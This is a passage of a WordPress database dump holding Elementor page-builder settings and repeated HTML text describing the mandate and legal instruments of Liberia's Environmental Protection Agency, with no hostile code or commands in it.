Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17489,1608,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17491,2578,'_elementor_edit_mode','builder'),(17492,2578,'_elementor_template_type','wp-post'),(17493,2578,'_elementor_version','2.7.5'),(17494,2578,'_wp_page_template','default'),(17495,2578,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"066c3e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9a406d7\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d681787\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(17496,2578,'_thumbnail_id','2035'),(17499,2579,'_elementor_edit_mode','builder'),(17500,2579,'_elementor_template_type','wp-post'),(17501,2579,'_elementor_version','2.7.5'),(17502,2579,'_wp_page_template','default'),(17503,2579,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"066c3e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9a406d7\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d681787\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(17504,2579,'_thumbnail_id','2035'),(17506,2580,'_elementor_edit_mode','builder'),(17507,2580,'_elementor_template_type','wp-post'),(17508,2580,'_elementor_version','2.7.5'),(17509,2580,'_wp_page_template','default'),(17510,2580,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layo